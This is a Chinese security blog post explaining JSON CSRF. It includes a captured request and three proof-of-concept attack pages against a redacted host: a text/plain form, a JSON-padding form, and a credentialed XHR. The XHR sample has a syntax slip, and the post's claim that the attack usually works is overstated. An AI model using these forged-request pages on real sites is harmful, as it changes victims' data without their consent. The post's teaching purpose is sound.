• 【CSRF技巧拓展】————3、关于JSON CSRF的一些思考


    CSRF作为常见漏洞,一直受到关注和研究,JSON是一种应用广泛的轻量级数据交换格式,当CSRF去POST一段JSON,情况可能会变得有些不一样;此次就一种特殊情况下的CSRF进行分析,权当抛砖引玉。 

    某次遇到一个没有验证token与referer的CSRF。

    其原始数据包为:

    POST /webnet/edit HTTP/1.1
    Host: www.xxx.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    Content-Length: 85
    Cookie: testcookie=yes; ASP.NET_SessionId=5udmqb45qoypdc55mfp1w4vy
    
    {"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"}

    很明显,这是个编辑某种信息的操作,POST的是一段JSON,且没有对token和referer的验证用form来提交,poc如下,把name置为一段JSON,其value置为空:

    <html>
       <body>
        <form action="http://www.xxx.com/webnet/edit" method="POST" enctype="text/plain">
          <input type="hidden" name="&#123;&quot;pSpotId&quot;&#58;&quot;120201&quot;&#44;&quot;pSignTimes&quot;&#58;&quot;70&quot;&#44;&quot;pModuleID&quot;&#58;&quot;207&quot;&#44;&quot;pSceneid&quot;&#58;&quot;120201007000046&quot;&#125;" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

    不过这样POST的数据包会多一个“=”,因为我们虽然把value置为空,然后还是会出现“name=”。

    这种情况下服务端的JSON解析器可能会拒绝这段JSON,因为它不符合JSON的数据格式。参照外国基佬的做法,我们可以给value赋值从而对这个“=”后面的数据进行补全,使得其构成一个完整的JSON格式,可避免解析器报错(JSON Padding)。
    POC如下:

    <html>  
    <form action="http://www.xxx.com/webnet/edit" method="POST" enctype="text/plain">  
    <input name='{"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046", "test":"' value='test"}'type='hidden'>  
    <input type=submit>  
    </form>  
    </html> 

    需要注意的是,在原始的数据包里Content-Type的值是application/json,而以form去提交是没法设置enctype为application/json的,在这里设置为text/plain,那么如何设置Content-Type的值呢?所以我们需要利用XHR进行提交,关于XHR的背景知识不再赘述:https://en.wikipedia.org/wiki/XMLHttpRequest。POC如下(其中将content-type设置为application/json):

    <html>
      <body>
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://www.xxx.com/webnet/edit", true);
            xhr.setRequestHeader("Accept", "*/*");
            xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
            xhr.setRequestHeader("Content-Type", "application/json; charset=utf-8");
            xhr.withCredentials = true;
            xhr.send(JSON.stringify({"pSpotId":"120201","pSignTimes":"70","pModuleID":"207","pSceneid":"120201007000046"});
        }
        </script>
        <form action="#">
          <input type="button" value="Submit request" onclick="submitRequest();"/>
        </form>
      </body>
    </html>

    在CORS标准中,定义了新的HTTP消息头Access-Control-Allow-Origin,使得服务端可以定义允许通过浏览器请求的域集合。另外,标准定义了当跨域影响用户数据HTTP请求(如用XMLHttpRequest发送post)时,浏览器会发送预检请求(OPTIONS请求)给服务端征求支持的请求方法,然后根据服务端响应允许才发送真正的请求。

    在某些情况中,如果服务端对Content-Type进行校验,则不会响应这个OPTIONS请求,从而利用失败,但是更多的情况下服务端可能不会校验Content-Type,或者不会严格校验Content-Type是否为application/json,所以很多情况下这是可用的。

    参考文献:

    • http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html
    • http://huang-x-h.github.io/2015/03/11/cors-preflight/
    • https://groups.google.com/forum/#!topic/null-co-in/qymGjGTwE04
    • http://harttle.com/2016/12/30/cors-preflight.html
    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    openssh升级
    Mysql基础学习_Windows版(一)
    centos7 取消Ctrl+Alt+Del重启功能
    linux shell数值比较和字符串比较
    linux 使用中括号进行条件判断
    VXLAN简介(摘抄)
    centos配置NTP服务器
    Centos配置网卡子接口
    组播___IGMP
    组播
  • 原文地址:https://www.cnblogs.com/devi1/p/13486388.html
Copyright © 2020-2023  润新知